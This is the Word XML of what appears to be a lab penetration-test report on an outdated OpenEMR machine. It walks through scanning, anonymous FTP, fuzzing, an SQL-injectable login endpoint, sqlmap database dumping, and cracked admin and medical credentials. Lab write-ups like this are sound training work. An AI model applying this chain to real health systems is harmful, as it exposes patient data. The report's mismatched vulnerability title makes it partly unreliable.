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3"/>
        <w:gridCol w:w="7753"/>
      </w:tblGrid>
      <w:tr w:rsidR="00970758" w:rsidRPr="006C058B" w14:paraId="6A7802A1" w14:textId="77777777" w:rsidTr="001D49B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E97BA7" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r w:rsidRPr="006C058B">
              <w:t xml:space="preserve">Machine Description </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7603" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="393968D8" w14:textId="093D6D5D" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="001D49B6" w:rsidP="00936BA6">
            <w:r w:rsidRPr="001D49B6">
              <w:t xml:space="preserve">The target runs an outdated version of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001D49B6">
              <w:t>OpenEMR</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001D49B6">
              <w:t xml:space="preserve"> that may contain known security vulnerabilities. The identified SQL injection flaw could allow unauthorized database access and potentially expose sensitive information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970758" w:rsidRPr="006C058B" w14:paraId="061DAB6F" w14:textId="77777777" w:rsidTr="001D49B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1909C45D" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r w:rsidRPr="006C058B">
              <w:t>Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7603" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26BEF083" w14:textId="3BA57A4B" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006E1B27" w:rsidP="00936BA6">
            <w:r>
              <w:t>192.168.0.117</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970758" w:rsidRPr="006C058B" w14:paraId="165984C0" w14:textId="77777777" w:rsidTr="001D49B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B466CA2" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r w:rsidRPr="006C058B">
              <w:t xml:space="preserve">Vulnerability Name </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7603" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D8E33AE" w14:textId="77777777" w:rsidR="006C058B" w:rsidRDefault="001D49B6" w:rsidP="00936BA6">
            <w:r w:rsidRPr="001D49B6">
              <w:t>Improper PATH Configuration Leading to Potential Privilege Escalation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17C25C3E" w14:textId="783FB905" w:rsidR="001D49B6" w:rsidRPr="006C058B" w:rsidRDefault="001D49B6" w:rsidP="00936BA6">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>OpenEMr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Version 4.1.0 is running </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> caused </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>injectection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970758" w:rsidRPr="006C058B" w14:paraId="182825FE" w14:textId="77777777" w:rsidTr="001D49B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03468582" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r w:rsidRPr="006C058B">
              <w:t xml:space="preserve">Service Version </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7603" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="437C71D7" w14:textId="6C0AE2C2" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="001D49B6" w:rsidP="00936BA6">
            <w:r w:rsidRPr="001D49B6">
              <w:t xml:space="preserve">TCP / 80 HTTP Apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001D49B6">
              <w:t>httpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001D49B6">
              <w:t xml:space="preserve"> 2.2.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970758" w:rsidRPr="006C058B" w14:paraId="750F55D1" w14:textId="77777777" w:rsidTr="001D49B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5746466E" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r w:rsidRPr="006C058B">
              <w:t>CVSS score and Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7603" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E08DCE7" w14:textId="2A9E65FE" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="001D49B6" w:rsidP="00936BA6">
            <w:r>
              <w:t>9.8 Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970758" w:rsidRPr="006C058B" w14:paraId="10DD78AE" w14:textId="77777777" w:rsidTr="001D49B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="685C3333" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r w:rsidRPr="006C058B">
              <w:t xml:space="preserve">Attack Vector </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7603" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34252A88" w14:textId="4145F146" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="001D49B6" w:rsidP="00936BA6">
            <w:r w:rsidRPr="001D49B6">
              <w:t>CVSS:3.0/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001D49B6">
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001D49B6">
              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970758" w:rsidRPr="006C058B" w14:paraId="4E15BDA1" w14:textId="77777777" w:rsidTr="001D49B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B6B5373" w14:textId="77777777" w:rsidR="006C058B" w:rsidRPr="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r w:rsidRPr="006C058B">
              <w:t xml:space="preserve">Proof of Concept </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7603" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F6D2B01" w14:textId="77777777" w:rsidR="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r>
              <w:t xml:space="preserve">Step 1: Find Ip address Using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>netdiscover</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A17C977" w14:textId="63D5018C" w:rsidR="006C058B" w:rsidRDefault="0072413C" w:rsidP="00936BA6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DA95702" wp14:editId="6B308289">
                  <wp:extent cx="4000500" cy="12964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5610" r="40113" b="50846"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4034577" cy="1307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9896B3" w14:textId="77777777" w:rsidR="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r>
              <w:t xml:space="preserve">Step 2: Detect the open ports service and version </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01DA1AE9" w14:textId="0EA40214" w:rsidR="006C058B" w:rsidRDefault="0072413C" w:rsidP="00936BA6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44F07BA7" wp14:editId="13C91AE4">
                  <wp:extent cx="4076700" cy="20657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12287" r="22850"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4117527" cy="2086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D20078" w14:textId="136B9634" w:rsidR="006C058B" w:rsidRDefault="006C058B" w:rsidP="00936BA6">
            <w:r>
              <w:t xml:space="preserve">Step 3: </w:t>
            </w:r>
            <w:r w:rsidR="0072413C">
              <w:t>FTP Service is running on targeted machine lets enumerate using anonymous login.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00F6CDEB" w14:textId="6D7F8D48" w:rsidR="0072413C" w:rsidRDefault="0072413C" w:rsidP="00936BA6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3471DF4B" wp14:editId="560EA0FA">
                  <wp:extent cx="4023142" cy="8968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61171" r="22368"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4054968" cy="903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68DDC0" w14:textId="67736E0C" w:rsidR="006C058B" w:rsidRDefault="00DA52CE" w:rsidP="00936BA6">
            <w:r>
              <w:t xml:space="preserve">Step 4: </w:t>
            </w:r>
            <w:r w:rsidR="0072413C">
              <w:t>Lets enumerate port 80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="429D9FCE" w14:textId="77777777" w:rsidR="00DA52CE" w:rsidRDefault="0072413C" w:rsidP="00936BA6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="797F71D8" wp14:editId="564B5517">
                  <wp:extent cx="4086225" cy="1897633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564" cy="191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BF6CB7" w14:textId="77777777" w:rsidR="0072413C" w:rsidRDefault="0072413C" w:rsidP="00936BA6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Looking like site is under construction</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B972429" w14:textId="3C6E47A6" w:rsidR="0072413C" w:rsidRDefault="0072413C" w:rsidP="00936BA6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Try to access robots.txt in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="08708F92" w14:textId="77777777" w:rsidR="0072413C" w:rsidRDefault="0072413C" w:rsidP="00936BA6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="302A6F37" wp14:editId="510C5B46">
                  <wp:extent cx="3955415" cy="1835624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280"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4001525" cy="1857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60BC35" w14:textId="21388CD2" w:rsidR="0072413C" w:rsidRDefault="0072413C" w:rsidP="00936BA6">
            <w:r>
              <w:t xml:space="preserve">Step 5: </w:t>
            </w:r>
            <w:r w:rsidRPr="0072413C">
              <w:t>Let</w:t>
            </w:r>
            <w:r w:rsidR="00134163">
              <w:t>’</w:t>
            </w:r>
            <w:r w:rsidRPr="0072413C">
              <w:t xml:space="preserve">s look for available Directories and files on webserver its hosting on HTTP port 80 by fuzzing </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="117F1C00" w14:textId="77777777" w:rsidR="00134163" w:rsidRDefault="00134163" w:rsidP="00936BA6"/>
          <w:p w14:paraId="5723B878" w14:textId="0D374968" w:rsidR="0072413C" w:rsidRPr="0072413C" w:rsidRDefault="00F17A72" w:rsidP="00936BA6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D07D899" wp14:editId="53404082">
                  <wp:extent cx="4086225" cy="2074802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14959" r="25350"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4100232" cy="2081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88FAEF" w14:textId="77777777" w:rsidR="0072413C" w:rsidRDefault="00AD1B03" w:rsidP="00936BA6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Directories</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10310A86" w14:textId="77777777" w:rsidR="00AD1B03" w:rsidRDefault="00881C28" w:rsidP="00936BA6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295F2F5F" wp14:editId="27CC4168">
                  <wp:extent cx="4086528" cy="20193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3740" r="19755" b="7296"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4097773" cy="2024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F82501" w14:textId="77777777" w:rsidR="001F317E" w:rsidRPr="001F317E" w:rsidRDefault="001F317E" w:rsidP="00936BA6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="001F317E">
              <w:t xml:space="preserve">Found </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001F317E">
              <w:t>openemr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001F317E">
              <w:t xml:space="preserve"> on server lets enumerate what we can get over there </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3824A604" w14:textId="77777777" w:rsidR="00881C28" w:rsidRDefault="001F317E" w:rsidP="00936BA6">
            <w:r w:rsidRPr="001F317E">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E0161A5" wp14:editId="60EC489E">
                  <wp:extent cx="4152900" cy="222828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303" cy="2246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9C786" w14:textId="77777777" w:rsidR="001F317E" w:rsidRDefault="001F317E" w:rsidP="00936BA6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">In this page we also got version for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>openemr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="246A9786" w14:textId="77777777" w:rsidR="001F317E" w:rsidRDefault="001F317E" w:rsidP="00936BA6">
            <w:r>
              <w:t xml:space="preserve">Step 6: Search Exploit for above version in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>exploitdb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>seachsploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="08D4CDFD" w14:textId="3AE80978" w:rsidR="001F317E" w:rsidRDefault="001F317E" w:rsidP="00936BA6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72C01170" wp14:editId="2999D349">
                  <wp:extent cx="4000500" cy="1196485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32898"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114137" cy="1230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00F5B" w14:textId="2AC8E0A9" w:rsidR="00936BA6" w:rsidRDefault="00936BA6" w:rsidP="00936BA6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Let’s fetch the endpoint from the exploit code where we can try to SQL Injection using SQL Map </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40CA4952" w14:textId="77777777" w:rsidR="001F317E" w:rsidRDefault="00936BA6" w:rsidP="00936BA6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CE35975" wp14:editId="348BDA1F">
                  <wp:extent cx="3962400" cy="1078956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67042" r="46052"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3993662" cy="1087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1C49E4" w14:textId="77777777" w:rsidR="00936BA6" w:rsidRDefault="00936BA6" w:rsidP="00936BA6">
            <w:r>
              <w:t xml:space="preserve">From above </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00936BA6">
              <w:t>http://192.168.56.106/openemr/interface/login/validateUser.php?u="</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Change the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> address for further process.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26867CB7" w14:textId="77777777" w:rsidR="00936BA6" w:rsidRDefault="00936BA6" w:rsidP="00936BA6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modify and save it in variable </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C15F406" w14:textId="77777777" w:rsidR="00936BA6" w:rsidRDefault="00936BA6" w:rsidP="00936BA6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616D49C" wp14:editId="5637919B">
                  <wp:extent cx="3888188" cy="773400"/>
                  <wp:effectExtent l="0" t="0" r="0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-1" t="69721" r="32152"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3888754" cy="773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F20C3D" w14:textId="77777777" w:rsidR="00936BA6" w:rsidRDefault="00A72B38" w:rsidP="00936BA6">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Step 7: Lets enumerate the website using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CC5F571" w14:textId="7253BFCF" w:rsidR="00A72B38" w:rsidRDefault="00EB1B19" w:rsidP="00936BA6">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11F24A82" wp14:editId="596852BD">
                  <wp:extent cx="4257446" cy="1634388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36055" r="25750" b="-1"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4258467" cy="163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8F4D4" w14:textId="77777777" w:rsidR="00A72B38" w:rsidRDefault="00A72B38" w:rsidP="00A72B38">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Got database names I tried to enumerate.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49C52CCA" w14:textId="77777777" w:rsidR="00A72B38" w:rsidRDefault="00EB1B19" w:rsidP="00A72B38">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53769225" wp14:editId="14A3A2F9">
                  <wp:extent cx="4074770" cy="1816322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415" cy="1826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AC4FC" w14:textId="77777777" w:rsidR="00EB1B19" w:rsidRPr="00EB1B19" w:rsidRDefault="00EB1B19" w:rsidP="00EB1B19">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB1B19">
              <w:t xml:space="preserve">Found various table names Lets dump values form table got values from tables </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36688302" w14:textId="77777777" w:rsidR="00EB1B19" w:rsidRDefault="00F270C8" w:rsidP="00A72B38">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07560F8C" wp14:editId="36593CE1">
                  <wp:extent cx="4549224" cy="1391700"/>
                  <wp:effectExtent l="0" t="0" r="381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431" r="16198" b="41055"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4598072" cy="1406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4FB02E" w14:textId="77777777" w:rsidR="00A64573" w:rsidRDefault="00A64573" w:rsidP="00A64573">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Got hashes </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13489CF2" w14:textId="77777777" w:rsidR="00A64573" w:rsidRDefault="00A64573" w:rsidP="00A64573">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD48BAF" wp14:editId="773B4569">
                  <wp:extent cx="2359924" cy="727100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17617" t="71534" r="41200"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2361945" cy="727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4A2227" w14:textId="77777777" w:rsidR="00A64573" w:rsidRDefault="00A64573" w:rsidP="00A64573">
            <w:r>
              <w:t xml:space="preserve">Medical: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A64573">
              <w:t>ab24aed5a7c4ad45615cd7e0da816eea39e4895d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421AE64A" w14:textId="77777777" w:rsidR="00A64573" w:rsidRDefault="00A64573" w:rsidP="00A64573">
            <w:r w:rsidRPr="00A64573">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FC092A2" wp14:editId="1A2B1DC5">
                  <wp:extent cx="3965042" cy="1899989"/>
                  <wp:effectExtent l="0" t="0" r="0" b="508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742" cy="191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C26B5" w14:textId="77777777" w:rsidR="00A64573" w:rsidRDefault="00A64573" w:rsidP="00A64573">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36487DBD" wp14:editId="30F1DE2E">
                  <wp:extent cx="2508276" cy="687629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17095" t="33764" r="39160" b="39332"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2508878" cy="687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E0FF17" w14:textId="77777777" w:rsidR="00A64573" w:rsidRDefault="00A64573" w:rsidP="00A64573">
            <w:r>
              <w:t>Admin:</w:t>
            </w:r>
            <w:r w:rsidR="003F07F9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003F07F9" w:rsidRPr="003F07F9">
              <w:t>3863efef9ee2bfbc51ecdca359c6302bed1389e8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49A4CA5C" w14:textId="77777777" w:rsidR="003F07F9" w:rsidRDefault="003F07F9" w:rsidP="00A64573">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AE4DB09" wp14:editId="1E4EDBCB">
                  <wp:extent cx="4171565" cy="1982419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5883" cy="2027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ECCD5A" w14:textId="32F9EFBD" w:rsidR="003F07F9" w:rsidRPr="003F07F9" w:rsidRDefault="003F07F9" w:rsidP="003F07F9">
            <w:r w:rsidRPr="003F07F9">
              <w:t xml:space="preserve">USER: admin PASS: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003F07F9">
              <w:t>ackbar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="188EF78C" w14:textId="396EE68C" w:rsidR="003F07F9" w:rsidRPr="003F07F9" w:rsidRDefault="003F07F9" w:rsidP="003F07F9">
            <w:r w:rsidRPr="003F07F9">
              <w:t>USER: medical PASS: medical</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3AD227" w14:textId="77777777" w:rsidR="003F07F9" w:rsidRDefault="003F07F9" w:rsidP="00A64573">
            <w:r>
              <w:t xml:space="preserve">Step 8: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Loging</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>openemr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> website using above credentials </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43ABE7AA" w14:textId="77777777" w:rsidR="003F07F9" w:rsidRDefault="003F07F9" w:rsidP="00A64573">
            <w:r w:rsidRPr="003F07F9">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44EA8C58" wp14:editId="68FFB3FB">
                  <wp:extent cx="4506367" cy="1993738"/>
                  <wp:effectExtent l="0" t="0" r="0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115" cy="200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DF8FC" w14:textId="77777777" w:rsidR="00970758" w:rsidRPr="00970758" w:rsidRDefault="00970758" w:rsidP="00970758">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
